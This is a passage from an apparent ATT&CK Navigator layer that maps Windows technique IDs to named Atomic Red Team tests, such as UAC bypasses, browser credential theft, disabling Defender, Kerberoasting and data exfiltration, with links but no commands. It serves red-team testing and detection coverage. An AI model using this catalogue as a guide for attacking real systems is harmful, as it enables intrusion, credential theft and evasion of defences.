Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":24,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":13,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":54,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":31,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View 